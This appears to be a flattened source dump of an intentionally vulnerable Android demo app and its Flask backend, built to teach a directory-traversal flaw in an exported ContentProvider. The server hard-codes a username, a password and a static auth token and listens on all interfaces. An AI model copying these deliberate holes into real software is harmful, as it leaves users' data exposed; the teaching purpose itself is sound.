https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/mipmap-hdpi/ic_launcher.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/mipmap-hdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/mipmap-hdpi/ic_launcher_round.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/mipmap-mdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/mipmap-mdpi/ic_launcher.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/mipmap-mdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/mipmap-mdpi/ic_launcher_round.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/mipmap-xhdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/mipmap-xhdpi/ic_launcher.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/mipmap-xxhdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/mipmap-xxhdpi/ic_launcher.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/values/colors.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | #937498
4 | #7A2C87
5 | #ED7D1E
6 | #F5F5F5
7 | #9AFFFFFF
8 |
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/values/strings.xml:
--------------------------------------------------------------------------------
1 |
2 | File App
3 | Login
4 | Files
5 | Configuration
6 | Unknown error occurred
7 | Invalid Username or Password
8 | Server Address
9 |
10 |
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/values/styles.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/FileApp/app/src/main/res/xml/filepaths.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/FileApp/app/src/test/java/dev/d0nut/vuln/fileapp/ExampleUnitTest.java:
--------------------------------------------------------------------------------
1 | package dev.d0nut.vuln.fileapp;
2 |
3 | import org.junit.Test;
4 |
5 | import static org.junit.Assert.*;
6 |
/**
 * Template local unit test; it executes on the development machine (host).
 *
 * @see Testing documentation
 */
public class ExampleUnitTest {
    /** Sanity check for the test runner: 2 + 2 must evaluate to 4. */
    @Test
    public void addition_isCorrect() {
        final int expected = 4;
        final int actual = 2 + 2;
        assertEquals(expected, actual);
    }
}
--------------------------------------------------------------------------------
/FileApp/build.gradle:
--------------------------------------------------------------------------------
// Top-level build file where you can add configuration options common to all sub-projects/modules.

buildscript {

    repositories {
        google()
        // NOTE(review): JCenter has been sunset and no longer receives new releases;
        // prefer mavenCentral() once every build dependency is confirmed to resolve from it.
        jcenter()

    }
    dependencies {
        // NOTE(review): old, pinned Android Gradle Plugin release; upgrade it together
        // with the Gradle wrapper version if this build is reused.
        classpath 'com.android.tools.build:gradle:3.6.3'


        // NOTE: Do not place your application dependencies here; they belong
        // in the individual module build.gradle files
    }
}

// Repositories used to resolve dependencies of every project in this build.
allprojects {
    repositories {
        google()
        // NOTE(review): same JCenter caveat as in the buildscript block of this file.
        jcenter()
    }
}

// Registers a `clean` task that deletes the root project's build directory.
task clean(type: Delete) {
    delete rootProject.buildDir
}
29 |
--------------------------------------------------------------------------------
/FileApp/gradle.properties:
--------------------------------------------------------------------------------
1 | # Project-wide Gradle settings.
2 | # IDE (e.g. Android Studio) users:
3 | # Gradle settings configured through the IDE *will override*
4 | # any settings specified in this file.
5 | # For more details on how to configure your build environment visit
6 | # http://www.gradle.org/docs/current/userguide/build_environment.html
7 | # Specifies the JVM arguments used for the daemon process.
8 | # The setting is particularly useful for tweaking memory settings.
9 | org.gradle.jvmargs=-Xmx1536m
10 | # When configured, Gradle will run in incubating parallel mode.
11 | # This option should only be used with decoupled projects. More details, visit
12 | # http://www.gradle.org/docs/current/userguide/multi_project_builds.html#sec:decoupled_projects
13 | # org.gradle.parallel=true
14 | # AndroidX package structure to make it clearer which packages are bundled with the
15 | # Android operating system, and which are packaged with your app's APK
16 | # https://developer.android.com/topic/libraries/support-library/androidx-rn
17 | android.useAndroidX=true
18 | # Automatically convert third-party libraries to use AndroidX
19 | android.enableJetifier=true
20 |
21 |
--------------------------------------------------------------------------------
/FileApp/gradle/wrapper/gradle-wrapper.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/gradle/wrapper/gradle-wrapper.jar
--------------------------------------------------------------------------------
/FileApp/gradle/wrapper/gradle-wrapper.properties:
--------------------------------------------------------------------------------
#Thu Apr 30 19:51:54 PDT 2020
distributionBase=GRADLE_USER_HOME
distributionPath=wrapper/dists
zipStoreBase=GRADLE_USER_HOME
zipStorePath=wrapper/dists
# NOTE(review): no distributionSha256Sum is set, so the wrapper does not verify
# the integrity of the distribution archive it downloads. Pin it, for example:
# distributionSha256Sum=<SHA-256 of gradle-5.6.4-all.zip as published by Gradle>
distributionUrl=https\://services.gradle.org/distributions/gradle-5.6.4-all.zip
7 |
--------------------------------------------------------------------------------
/FileApp/gradlew:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env sh
2 |
3 | ##############################################################################
4 | ##
5 | ## Gradle start up script for UN*X
6 | ##
7 | ##############################################################################
8 |
# Attempt to set APP_HOME
# Resolve links: $0 may be a link
PRG="$0"
# Need this for relative symlinks.
# Follow the symlink chain: an absolute link target replaces PRG outright,
# a relative one is resolved against the directory of the current PRG.
while [ -h "$PRG" ] ; do
    ls=`ls -ld "$PRG"`
    link=`expr "$ls" : '.*-> \(.*\)$'`
    if expr "$link" : '/.*' > /dev/null; then
        PRG="$link"
    else
        PRG=`dirname "$PRG"`"/$link"
    fi
done
# Remember the caller's directory, record the physical (pwd -P) path of the
# script's directory as APP_HOME, then change back.
SAVED="`pwd`"
cd "`dirname \"$PRG\"`/" >/dev/null
APP_HOME="`pwd -P`"
cd "$SAVED" >/dev/null

APP_NAME="Gradle"
APP_BASE_NAME=`basename "$0"`

# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
DEFAULT_JVM_OPTS=""

# Use the maximum available, or set MAX_FD != -1 to use that value.
MAX_FD="maximum"
35 |
# Print all arguments as one line on standard output and continue.
warn () {
    echo "$*"
}
39 |
# Print the message between two blank lines on standard output,
# then terminate the script with exit status 1.
die () {
    echo
    echo "$*"
    echo
    exit 1
}
46 |
# OS specific support (must be 'true' or 'false').
cygwin=false
msys=false
darwin=false
nonstop=false
# Set exactly one platform flag from the kernel name reported by uname.
case "`uname`" in
  CYGWIN* )
    cygwin=true
    ;;
  Darwin* )
    darwin=true
    ;;
  MINGW* )
    msys=true
    ;;
  NONSTOP* )
    nonstop=true
    ;;
esac

# NOTE(review): the wrapper JAR is a binary committed to the repository and is
# the code this script ends up executing; verify it against the checksums
# Gradle publishes for wrapper JARs before trusting a checkout.
CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar
68 |
# Determine the Java command to use to start the JVM.
# With JAVA_HOME set, the binary under it is used and must be executable;
# otherwise the script falls back to whatever `java` is found on PATH.
if [ -n "$JAVA_HOME" ] ; then
    if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
        # IBM's JDK on AIX uses strange locations for the executables
        JAVACMD="$JAVA_HOME/jre/sh/java"
    else
        JAVACMD="$JAVA_HOME/bin/java"
    fi
    if [ ! -x "$JAVACMD" ] ; then
        die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME

Please set the JAVA_HOME variable in your environment to match the
location of your Java installation."
    fi
else
    JAVACMD="java"
    which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.

Please set the JAVA_HOME variable in your environment to match the
location of your Java installation."
fi
90 |
# Increase the maximum file descriptors if we can.
# Skipped on Cygwin, Darwin and NonStop; failures only produce a warning.
if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then
    MAX_FD_LIMIT=`ulimit -H -n`
    if [ $? -eq 0 ] ; then
        # "maximum"/"max" means: raise the soft limit to the hard limit just queried.
        if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then
            MAX_FD="$MAX_FD_LIMIT"
        fi
        ulimit -n $MAX_FD
        if [ $? -ne 0 ] ; then
            warn "Could not set maximum file descriptor limit: $MAX_FD"
        fi
    else
        warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT"
    fi
fi
106 |
# For Darwin, add options to specify how the application appears in the dock
if $darwin; then
    GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\""
fi

# For Cygwin, switch paths to Windows format before running java
if $cygwin ; then
    APP_HOME=`cygpath --path --mixed "$APP_HOME"`
    CLASSPATH=`cygpath --path --mixed "$CLASSPATH"`
    JAVACMD=`cygpath --unix "$JAVACMD"`

    # We build the pattern for arguments to be converted via cygpath
    # (an alternation of the top-level directories found under /).
    ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null`
    SEP=""
    for dir in $ROOTDIRSRAW ; do
        ROOTDIRS="$ROOTDIRS$SEP$dir"
        SEP="|"
    done
    OURCYGPATTERN="(^($ROOTDIRS))"
    # Add a user-defined pattern to the cygpath arguments
    if [ "$GRADLE_CYGPATTERN" != "" ] ; then
        OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)"
    fi
    # Now convert the arguments - kludge to limit ourselves to /bin/sh
    # NOTE(review): both eval lines below re-parse text derived from "$arg" as
    # shell syntax, so on Cygwin the command line must come from a trusted caller.
    i=0
    for arg in "$@" ; do
        CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -`
        CHECK2=`echo "$arg"|egrep -c "^-"`                                 ### Determine if an option

        if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then                    ### Added a condition
            eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"`
        else
            eval `echo args$i`="\"$arg\""
        fi
        i=$((i+1))
    done
    # Rebuild the positional parameters from args0..args8; counts other than
    # 0-9 match no branch and leave "$@" as it was.
    case $i in
        (0) set -- ;;
        (1) set -- "$args0" ;;
        (2) set -- "$args0" "$args1" ;;
        (3) set -- "$args0" "$args1" "$args2" ;;
        (4) set -- "$args0" "$args1" "$args2" "$args3" ;;
        (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;;
        (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;;
        (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;;
        (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;;
        (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;;
    esac
fi
156 |
# Escape application args
# Prints each argument wrapped in single quotes, with every embedded single
# quote rewritten as '\'' and a trailing " \" continuation, followed by a final
# line holding one space. The output is meant to be re-read by `eval set --`.
save () {
    for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done
    echo " "
}
# Quote the original command-line arguments so they survive the eval below.
APP_ARGS=$(save "$@")

# Collect all arguments for the java command, following the shell quoting and substitution rules
# NOTE(review): DEFAULT_JVM_OPTS, JAVA_OPTS and GRADLE_OPTS are expanded unquoted
# and re-parsed by eval, so their contents are interpreted as shell syntax; they
# must come from a trusted environment.
eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS"

# by default we should be in the correct project dir, but when run from Finder on Mac, the cwd is wrong
if [ "$(uname)" = "Darwin" ] && [ "$HOME" = "$PWD" ]; then
    cd "$(dirname "$0")"
fi

# Replace this shell with the JVM, passing the argument list assembled above.
exec "$JAVACMD" "$@"
173 |
--------------------------------------------------------------------------------
/FileApp/gradlew.bat:
--------------------------------------------------------------------------------
@if "%DEBUG%" == "" @echo off
@rem ##########################################################################
@rem
@rem Gradle startup script for Windows
@rem
@rem ##########################################################################

@rem Set local scope for the variables with windows NT shell
if "%OS%"=="Windows_NT" setlocal

@rem APP_HOME is the directory containing this script (%~dp0), or "." if that is empty.
set DIRNAME=%~dp0
if "%DIRNAME%" == "" set DIRNAME=.
set APP_BASE_NAME=%~n0
set APP_HOME=%DIRNAME%

@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
set DEFAULT_JVM_OPTS=

@rem Find java.exe
if defined JAVA_HOME goto findJavaFromJavaHome

@rem No JAVA_HOME: probe for java.exe on PATH by running it once.
set JAVA_EXE=java.exe
%JAVA_EXE% -version >NUL 2>&1
if "%ERRORLEVEL%" == "0" goto init

echo.
echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
echo.
echo Please set the JAVA_HOME variable in your environment to match the
echo location of your Java installation.

goto fail

:findJavaFromJavaHome
@rem Strip any double quotes from JAVA_HOME before building the java.exe path.
set JAVA_HOME=%JAVA_HOME:"=%
set JAVA_EXE=%JAVA_HOME%/bin/java.exe

if exist "%JAVA_EXE%" goto init

echo.
echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME%
echo.
echo Please set the JAVA_HOME variable in your environment to match the
echo location of your Java installation.

goto fail

:init
@rem Get command-line arguments, handling Windows variants

@rem Both outcomes of this test continue at the label on the next line.
if not "%OS%" == "Windows_NT" goto win9xME_args

:win9xME_args
@rem Slurp the command line arguments.
set CMD_LINE_ARGS=
set _SKIP=2

:win9xME_args_slurp
if "x%~1" == "x" goto execute

set CMD_LINE_ARGS=%*

:execute
@rem Setup the command line

@rem NOTE(review): the wrapper JAR is a binary committed to the repository and is
@rem the code this script executes; verify it against the checksums Gradle
@rem publishes for wrapper JARs before trusting a checkout.
set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar

@rem Execute Gradle
"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS%

:end
@rem End local scope for the variables with windows NT shell
if "%ERRORLEVEL%"=="0" goto mainEnd

:fail
rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of
rem the _cmd.exe /c_ return code!
if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1
exit /b 1

:mainEnd
if "%OS%"=="Windows_NT" endlocal

:omega
85 |
--------------------------------------------------------------------------------
/FileApp/settings.gradle:
--------------------------------------------------------------------------------
// Names the root project 'File App' and includes the single ':app' module.
rootProject.name='File App'
include ':app'
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Android Directory Traversal Vulnerable App & Exploit
2 |
3 | [Original Stream](https://www.youtube.com/watch?v=8WcJp1leaUo)
4 |
5 | This demonstration of an insecure `ContentProvider` was inspired by the first bug I ever found.
6 | The vulnerable app exports an insecure `ContentProvider` that allows a malicious application to read files from the vulnerable app's private internal storage.
7 |
8 |
9 |
--------------------------------------------------------------------------------
/server/app.py:
--------------------------------------------------------------------------------
1 | from flask import Flask, request
2 |
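# This is a completely unsafe, intentionally useless Flask app whose sole purpose
# is to give our Android app something to talk to. I've put no effort into making this safe
# and you should not copy any patterns I've used in here for security reasons.
#
# (Written as comments: a string literal that follows an import statement is
# not the module docstring, it is just a discarded expression.)

# WSGI application object that the route decorators in this file register on.
app = Flask(__name__)

# Static token returned by /api/auth and checked by /api/files.
# NOTE(review): a secret committed to source control is identical for every
# user and never expires; tolerable only because this server is a lab fixture.
AUTH_TOKEN = "587go576g1fvf764vi6fri5v6g7ri5"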
12 |
@app.route('/')
def root():
    """Serve a fixed plain-text greeting on the index route."""
    greeting = "Hello, world!"
    return greeting
16 |
17 |
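@app.route('/api/auth', methods=["POST"])
def login():
    """Check the posted credentials and return the shared auth token.

    Expects a JSON object with ``username`` and ``password`` fields.

    Returns:
        ``({"success": True, "data": {"token": ...}}, 200)`` when both fields
        match the hard-coded account, otherwise
        ``({"success": False, "data": {"error_message": ...}}, 401)``.
    """
    # The original indexed the parsed body directly, so a request without a
    # JSON object or without one of the fields raised TypeError/KeyError and
    # surfaced as an HTTP 500. Treat every malformed request as a failed login.
    body = request.get_json(silent=True)
    if not isinstance(body, dict):
        body = {}

    username = body.get("username")
    password = body.get("password")

    # This is intentionally bad.
    # We just need a "bare-minimum" server to interact with.
    # NOTE(review): hard-coded plaintext credentials and one static token for
    # every session -- lab fixture only, not a pattern to reuse.
    if username == "d0nut" and password == "hunter2":
        # return a pre-defined, hard-coded auth token
        return {"success": True, "data": {"token": AUTH_TOKEN}}, 200

    # error
    return {"success": False, "data": {"error_message": "Invalid username or password"}}, 401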
33 |
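@app.route('/api/files', methods=["POST"])
def get_files():
    """Return the fixed file listing to callers that present the auth token.

    Expects a JSON object with a ``token`` field.

    Returns:
        ``{"data": [...]}`` (HTTP 200) when the token matches ``AUTH_TOKEN``,
        otherwise ``({}, 401)``.
    """
    import hmac  # local import keeps this handler self-contained

    # A missing or non-object body, or a missing token, previously raised
    # TypeError/KeyError (HTTP 500); it is now treated as unauthenticated.
    body = request.get_json(silent=True)
    token = body.get("token") if isinstance(body, dict) else None

    # Compare as bytes in constant time so the check does not leak how much of
    # the token matched; "surrogatepass" keeps odd JSON strings from raising.
    authorised = isinstance(token, str) and hmac.compare_digest(
        token.encode("utf-8", "surrogatepass"),
        AUTH_TOKEN.encode("utf-8"),
    )
    if not authorised:
        return {}, 401

    # Static listing; the server stores no real files.
    files = [
        {"name": "selfie.jpeg", "mime": "image/jpeg"},
        {"name": "resume.docx", "mime": "application/vnd.openxmlformats-officedocument.wordprocessingml.document"},
        {"name": "image01.png", "mime": "image/png"},
        {"name": "image02.png", "mime": "image/png"},
        {"name": "invoice.pdf", "mime": "application/pdf"},
        {"name": "image03.png", "mime": "image/png"},
        {"name": "receipt.pdf", "mime": "application/pdf"},
        {"name": "image04.png", "mime": "image/png"},
        {"name": "image05.png", "mime": "image/png"},
        {"name": "image06.png", "mime": "image/png"},
        {"name": "image07.png", "mime": "image/png"},
        {"name": "presentation.docx", "mime": "application/vnd.openxmlformats-officedocument.wordprocessingml.document"},
        {"name": "data.xls", "mime": "application/vnd.ms-excel"},
    ]
    return {"data": files}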
58 |
if __name__ == "__main__":
    # NOTE(review): 0.0.0.0 listens on every network interface, so this
    # deliberately unsafe server is reachable by anything that can route to
    # the host; run it only on an isolated lab network.
    listen_host, listen_port = "0.0.0.0", 8888
    app.run(host=listen_host, port=listen_port)
61 |
--------------------------------------------------------------------------------
/server/requirements.txt:
--------------------------------------------------------------------------------
# NOTE(review): old pinned Flask release whose own dependencies are not pinned here;
# if this lab server is reused, upgrade Flask and pin the full dependency set (ideally with hashes).
flask==1.1.2
2 |
--------------------------------------------------------------------------------